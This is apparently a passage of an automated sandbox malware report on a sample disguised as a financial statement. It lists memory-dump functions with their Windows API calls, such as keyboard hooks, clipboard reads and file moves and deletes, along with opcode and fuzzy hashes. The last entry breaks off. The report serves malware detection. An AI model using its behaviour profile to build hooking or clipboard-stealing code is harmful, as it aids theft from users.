Opcode Fuzzy Hash: 786c1a32c1355f4a0e25465ad2c334c7a37ef014b5496d7b34b9fb72fdb64af9
Instruction Fuzzy Hash: 5441AEB1D003099FDF14DF9AC984ADEFBB5BF48310F24812AE419AB250D775A845CF91

Function 06AE6ADC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06AE7CC9

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4b3ed3c6661891b5a6fafc247a7769fdc446ece14d93a0a4b4bc9e9a1b5ca36d
Instruction ID: 1c3b267034746bc01499d17192e14df6380ecb9c6026562d41fbf6f0c329a620
Opcode Fuzzy Hash: 4b3ed3c6661891b5a6fafc247a7769fdc446ece14d93a0a4b4bc9e9a1b5ca36d
Instruction Fuzzy Hash: 7B4117B5A00315CFDB54DF99C888AAABBF9FB88314F24C459D519AB321D774E841CFA0

Function 015E77D4 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 015E86C0

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 596e5ceb55915794dfd307428009036bb05955ec5cacfdf569f1ec76c2c1ff64
Instruction ID: 145262a305123a7566b7ce71a7ba91aa96e15914a829e3cb7689b10f47ac1ecb
Opcode Fuzzy Hash: 596e5ceb55915794dfd307428009036bb05955ec5cacfdf569f1ec76c2c1ff64
Instruction Fuzzy Hash: AD3178B2C053589FCB01CFA9D844ADEBFF1BF89320F14849AD958AB252C3349944CFA5

Function 06AE8944 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06AE89D8

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: ac1e5efbef651ea0b479ae967ff20ea02318ed1f8181d003d1aec001a91fda09
Instruction ID: 74667a424f3b93d9c5a90c108a885e2b65ef0988b1e63c58f3a66622c3e18868
Opcode Fuzzy Hash: ac1e5efbef651ea0b479ae967ff20ea02318ed1f8181d003d1aec001a91fda09
Instruction Fuzzy Hash: B83124B0E01249DFDB54DFA8C984BDEBBF1AF48304F248059E408BB294DBB8A845CF55

Function 06AE8950 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06AE89D8

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: c0ad07e5201f50e211dc98337a780aa4e3268570062c2adb8e2cb399f5c1422a
Instruction ID: e7b5db04816de49272456183ada1e9a665e44a30346462ed6e9969d51220a811
Opcode Fuzzy Hash: c0ad07e5201f50e211dc98337a780aa4e3268570062c2adb8e2cb399f5c1422a
Instruction Fuzzy Hash: D73122B0D01208DFDB54DF99C984BCEBBF5AF48304F248019E408BB294DBB4A845CF95

Function 06AE6D68 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06AE6DF7

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 015c1fb38596d7383f0b52e11d89616749e6636c4209c80374bedc397379e327
Instruction ID: e7d9addf19736aa0f5421d86f3dfa61534386e1389855a43085f62995e2fe919
Opcode Fuzzy Hash: 015c1fb38596d7383f0b52e11d89616749e6636c4209c80374bedc397379e327
Instruction Fuzzy Hash: 8D21E6B5D00258EFDB10DFAAD984ADEBFF5EB48310F14841AE954A7350C374A944CFA5

Function 015E77F8 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 015E86C0

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: ae0cc87e5529c48c910a066080cb6d835a5a79df5ce6604e9e29dbecd22128dd
Instruction ID: d50e5e15804d2dac1291746a1ad4e8833f7a0c101b206af4dd82319a474f587f
Opcode Fuzzy Hash: ae0cc87e5529c48c910a066080cb6d835a5a79df5ce6604e9e29dbecd22128dd
Instruction Fuzzy Hash: 7F2125B6C012189FCB14CF99D984ADEFFF1FB88310F14845AE918AB214C775A944CFA4

Function 015E8628 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 015E86C0

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 092d873a81fab18ef1a3ca863cf116fbd6b5cc5443ad210a869fbb3748eea209
Instruction ID: 9ed721e470530cf23bdc760ca2be385b93155e379bcfea34b38b5e20c5990da3
Opcode Fuzzy Hash: 092d873a81fab18ef1a3ca863cf116fbd6b5cc5443ad210a869fbb3748eea209
Instruction Fuzzy Hash: 572113B6C012099FCB14CF99D484ADEBFF1BB88310F14845AE818AB255C7759A44CFA4

Function 06AEA708 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06AEA78B

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 87beb016350da8ca6f3f09ae24929e33ba8398d8320911c7f2d67615c4b2a028
Instruction ID: fca3c10f02a5a7649edee0dcb2a42c5e0a995122c31a67097e7aab6a0da02285
Opcode Fuzzy Hash: 87beb016350da8ca6f3f09ae24929e33ba8398d8320911c7f2d67615c4b2a028
Instruction Fuzzy Hash: 6E2115B5D002199FCB54DFAAC944BDEFBF5EF88320F208429E459A7250C774A944CFA5

Function 06AE6D70 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06AE6DF7

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0e22ff662e607759cdd372c7d09f18361acddc53df19b82e0d09909a3b854cbb
Instruction ID: 4dad703008239d798a9cc3feef5963b8253b6246e2d62792a9d44932499055e5
Opcode Fuzzy Hash: 0e22ff662e607759cdd372c7d09f18361acddc53df19b82e0d09909a3b854cbb
Instruction Fuzzy Hash: C621E2B5D002489FDB10CFAAD984ADEBFF8EB48320F14841AE918A7350C374A944CFA4

Function 06AE7D5C Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06AE8315), ref: 06AE839F

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b5f1557ae71934474250b37fd02757ff9fde0bf3d26a085733211c7e2f1cb391
Instruction ID: 5e46a3faa9ecb2b460a37035f77434f87687dc4c73de1b6c93c5586b2eb4c3f4
Opcode Fuzzy Hash: b5f1557ae71934474250b37fd02757ff9fde0bf3d26a085733211c7e2f1cb391
Instruction Fuzzy Hash: 84216DB18093999FCB11EFADC8547DEFFF4EF4A310F14409AD494A7252C274A844CBA5

Function 06AE21D3 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06AE2256

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 662974b27a56107f26ca5f3bad24875b40e5dc9b78350d0573832e4064c8b42f
Instruction ID: a69177ec7b3ef513fa43a941aa52f799f6bbaede9a44a9b98011c1a215a7f1f5
Opcode Fuzzy Hash: 662974b27a56107f26ca5f3bad24875b40e5dc9b78350d0573832e4064c8b42f
Instruction Fuzzy Hash: 762149B1C053888FCB15DFAAC844ACEBFF4EF4A310F14859AD458A7252C378A545CFA2

Function 015E8058 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 015E80D0

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5ec6cd45d6069204ef594b0d9edac7c1948a7cbe96da29ab2698f806575f70a1
Instruction ID: c0f56cb60b87c0c0a03ccb349be7e7fcc6732149ab3718bd8a13be0f7e762b13
Opcode Fuzzy Hash: 5ec6cd45d6069204ef594b0d9edac7c1948a7cbe96da29ab2698f806575f70a1
Instruction Fuzzy Hash: F72122B2C0065A9FCB24CF9AC545B9EFBF4FB48320F14812AD858B7251D778A944CFA5

Function 06AEA710 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06AEA78B

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9f85107d9d50fc4eefb1ad59dd28ad8bbb313a037e4945731e15a92ee43184a4
Instruction ID: 9fe33a439361fc635aaa2ec341aa155034cda907823c420bc33a0598c767c037
Opcode Fuzzy Hash: 9f85107d9d50fc4eefb1ad59dd28ad8bbb313a037e4945731e15a92ee43184a4
Instruction Fuzzy Hash: C02122B5D002099FCB54DFAAC944BEEFBF5EB88320F10842AE459A7250C774A944CFA5

Function 015EF412 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 015EF47F

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e21d2fd7368e580d181e9a86b2f4a87ee616a360f25ee335c2bb2349a06de88e
Instruction ID: 0e10656495878df85fdba71a3f1611d294bc0d7aa473609cec216c4f2442b79f
Opcode Fuzzy Hash: e21d2fd7368e580d181e9a86b2f4a87ee616a360f25ee335c2bb2349a06de88e
Instruction Fuzzy Hash: A71133B1C006599BCB10CF9AC444BDEFBF4BB48320F14812AE818A7251D778A944CFA5

Function 015E8060 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 015E80D0

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 4bb092541e346c91c3d21242e98f2cd2744927b5671c1abdbb7b9a24bb8bbab8
Instruction ID: e582d679936cf5f1b847c67aa3da10e78a280470a1f0d6fd45306a575bc6385a
Opcode Fuzzy Hash: 4bb092541e346c91c3d21242e98f2cd2744927b5671c1abdbb7b9a24bb8bbab8
Instruction Fuzzy Hash: 381133B2C0065A9FCB14CF9AC544B9EFBF4BB48320F14812AD858B7250D778A944CFA5

Function 015EF418 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 015EF47F

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c42d3ed2bf932ed1c5e1654d4a98e571610e290788a8630d723dc54fe8e4c3d7
Instruction ID: 99d775d45c8564334b6d621ecbbc8399c90f7e92a9a98ab30057c009cec789a8
Opcode Fuzzy Hash: c42d3ed2bf932ed1c5e1654d4a98e571610e290788a8630d723dc54fe8e4c3d7
Instruction Fuzzy Hash: 481123B1C0026A9BCB14CF9AC548BDEFBF4BF48320F14816AD818B7250D778A944CFA5

Function 06AE0804 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06AE2256

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3dd15a732a16fcc0f8ed8c60c269128156095ee836ea93a54d0d922c345e8bc9
Instruction ID: fa1c38c5da06eeb7d3b9ac076b5f8ca36da8ab92c8a1b911ced3c4d787212364
Opcode Fuzzy Hash: 3dd15a732a16fcc0f8ed8c60c269128156095ee836ea93a54d0d922c345e8bc9
Instruction Fuzzy Hash: 9C1102B6C002498FDB10EF9AC444BDEFBF8EB88314F10846AD829B7210C375A645CFA5

Function 06AE8338 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06AE8315), ref: 06AE839F

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f568df897703fe424a4bc9946b9edbc9064c9fc5ac6ec82f38a6d62171a4578e
Instruction ID: 8af0c5a03f28c1c1d0851313712dc2007b9ca83653f1838e611011ced54e51bb
Opcode Fuzzy Hash: f568df897703fe424a4bc9946b9edbc9064c9fc5ac6ec82f38a6d62171a4578e
Instruction Fuzzy Hash: 571145B1800249DFCB10DF9AC848BDEFFF4EB48320F208459D418A7250C774A944CFA5

Function 06AE7FB4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06AE885D

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0af61f30e7531a257364ea84b65ba41e46b62510948ed409b82cd4320176895b
Instruction ID: 5c9a735d1878f38622b55090ac81364a37606098079bd1424d0895e321914ff2
Opcode Fuzzy Hash: 0af61f30e7531a257364ea84b65ba41e46b62510948ed409b82cd4320176895b
Instruction Fuzzy Hash: 841115B1D003488FDB60EF9AD549BDEBBF4EB48324F208459D918B7210C379A944CFA5

Function 06AE7D7C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06AE8315), ref: 06AE839F

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1b8a913c2aeb5e9cff3bbcf6aa82552127198341ade377585e10f19136c860e1
Instruction ID: c4e1f476cf49911993c0c68f2af7d8bfdbf417c1374cd1ace3500103669cfc33
Opcode Fuzzy Hash: 1b8a913c2aeb5e9cff3bbcf6aa82552127198341ade377585e10f19136c860e1
Instruction Fuzzy Hash: DB1115B1900249CFCB50EF9AC448BDEFBF4EB48324F208459D559A7251C778A944CFA5

Function 06AE8801 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06AE885D

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 1dcd290a37b995d104613dc491d84d0bee8365220d52e5c8a208fa6228043473
Instruction ID: 6ae6bfe6ade5e478f08b013fcfe0673b92ecc29970e40081e8f87bcaa2e4d49c
Opcode Fuzzy Hash: 1dcd290a37b995d104613dc491d84d0bee8365220d52e5c8a208fa6228043473
Instruction Fuzzy Hash: 9E1103B58002488FDB20DFAAD549BDEBFF4EB48324F248459D558A7210C379A544CFA5

Function 06B4DA3D Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06B4DB99

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: f797455421eb0d4dbce12c80a23c4c293cc8df0c24b971786f8a8d7f6547557e
Instruction ID: ad284c5412e4d079d2e7605fc7eab0dd887930a59460dc01110b7db09fdd31f4
Opcode Fuzzy Hash: f797455421eb0d4dbce12c80a23c4c293cc8df0c24b971786f8a8d7f6547557e
Instruction Fuzzy Hash: 7941EFB0E1030A9FDB61EFA4C8946AEBBB2FF85300F104569E405EB340EB74D946DB91

Function 06B44708 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

XPcq, xrefs: 06B44845

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: XPcq
API String ID: 0-714321711
Opcode ID: 62abe151387b2beeccd8c9a18b1d2126651d5532bba5d549163a8ca1e0a44cfc
Instruction ID: 23b997444becebcc0bc8cb9cecacb770b259d53bbb34380ecb99640c949ef7b5
Opcode Fuzzy Hash: 62abe151387b2beeccd8c9a18b1d2126651d5532bba5d549163a8ca1e0a44cfc
Instruction Fuzzy Hash: 4D416170F002099FEB55AFA5C854B9EBBF7FF8C700F208529E106AB395DA748C019B91

Function 06B421B5 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06B42303

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 08d839f9f3b73ca20cc2088edb4dec004d8011a459b46be3ae5601326044c123
Instruction ID: 37d5941cfecba099c0cbf752bb2e6c541658aeb77d200a31dae3254f182aeb3a
Opcode Fuzzy Hash: 08d839f9f3b73ca20cc2088edb4dec004d8011a459b46be3ae5601326044c123
Instruction Fuzzy Hash: 09310370B14202DFDB59AB70C45426E7BE2FF89200F1485A8E006DB395DF39DD46EBA1

Function 06B421C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06B42303

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: f1198e10351aa327968627a0d3163e83b620c56e31a416445d00648feea48f53
Instruction ID: e86e795dde7c286d17e9a4760937bf9f7333df47ea24cfa58cb532eb54054843
Opcode Fuzzy Hash: f1198e10351aa327968627a0d3163e83b620c56e31a416445d00648feea48f53
Instruction Fuzzy Hash: 82310270B102059FDB59AB74C41466E7BE2FFC9600F108478E006EB394EE39DD46EBA1

Function 06B4FAE0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

|, xrefs: 06B4FB40

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 9062d9e55f5cf04899551e1127e830aac5b1cf15f8d68559f95cc14e4c37e045
Instruction ID: ac589083abad1f3c80e4c2bfaa3debe9e2dcfca54d989944f6e3e5d1cbae7b09
Opcode Fuzzy Hash: 9062d9e55f5cf04899551e1127e830aac5b1cf15f8d68559f95cc14e4c37e045
Instruction Fuzzy Hash: 2E118174B102149FDB54EF78D814BAE7BF9AF8C710F148469E60AE73A0DB359D018BA0

Function 06B4FAF0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 06B4FB40

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: f9f82577f95ccf32ab8793a4e2c74dc48e1109cf21db03b366f450822b21688c
Instruction ID: c84985b76b2d24052127727da1c255bacfbfe4e17794ede362e71ac56f5be30a
Opcode Fuzzy Hash: f9f82577f95ccf32ab8793a4e2c74dc48e1109cf21db03b366f450822b21688c
Instruction Fuzzy Hash: 6A115B70B002259FDB44AF78C814B6E7BF5AF8C610F1084A9E60AEB3A0DB759D018B91

Function 06B4B1B8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5faed1ff0269527407e561bb0def991fece2b6b11528f6385f4ba21472d66162
Instruction ID: a13105dcdbebe5515f8470de39a8fb9c488cd91f46304ffcef3906c9f3ccd0b3
Opcode Fuzzy Hash: 5faed1ff0269527407e561bb0def991fece2b6b11528f6385f4ba21472d66162
Instruction Fuzzy Hash: B2B17CB0E002098FDFA4EF68C490BADB7B1FB45310F1099A6E619DB351DA34EC82DB51

Function 06B45D58 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e5da807508b052d03276474f474ab08ace68cdc348a7bffefbea6f8ceb00cf
Instruction ID: 77516c5ef7c292b97ffa9f7d4fe49326f9e722d37a2c07924691115eef2ac8e8
Opcode Fuzzy Hash: f8e5da807508b052d03276474f474ab08ace68cdc348a7bffefbea6f8ceb00cf
Instruction Fuzzy Hash: 8061D2B2F404214FCB65AA7DC888A6FBAD7EFC4610B15447AD80EDB364DE65DD0287C2

Function 06B43E51 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7196d8ea1ab671d647e51027a621cc9f8526c37d24bd8a195cc3907a2a132996
Instruction ID: 46e14499e39f918a6f2f4e1345354907759969470386e140f53ffb7a1a5df3ea
Opcode Fuzzy Hash: 7196d8ea1ab671d647e51027a621cc9f8526c37d24bd8a195cc3907a2a132996
Instruction Fuzzy Hash: 7C815C70B002099FDB44EFA9C4947AEB7F2EB89304F149569D40AEB395EB35DC428B91

Function 06B4416C Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e1dbdf112811d93971d09469d239343b034950000e139306a43cd153fde1345
Instruction ID: 4bdc01a5bdd16d3ede20919ee8f82649a337204ee1c7a708c23de4c8b5b4bbd6
Opcode Fuzzy Hash: 9e1dbdf112811d93971d09469d239343b034950000e139306a43cd153fde1345
Instruction Fuzzy Hash: 09916E70E1021A8FDF60DF68C890B9DB7B1FF89300F208699D549BB255DB70AA85CF91

Function 06B44180 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a4e11b21cfeaf8c64864410e013ee1240a18aa382dddca588eb7c035a64661
Instruction ID: ed5d3402d8b4623ac0136328d36a518e43fae7f888be1abae20c73586a9c9a69
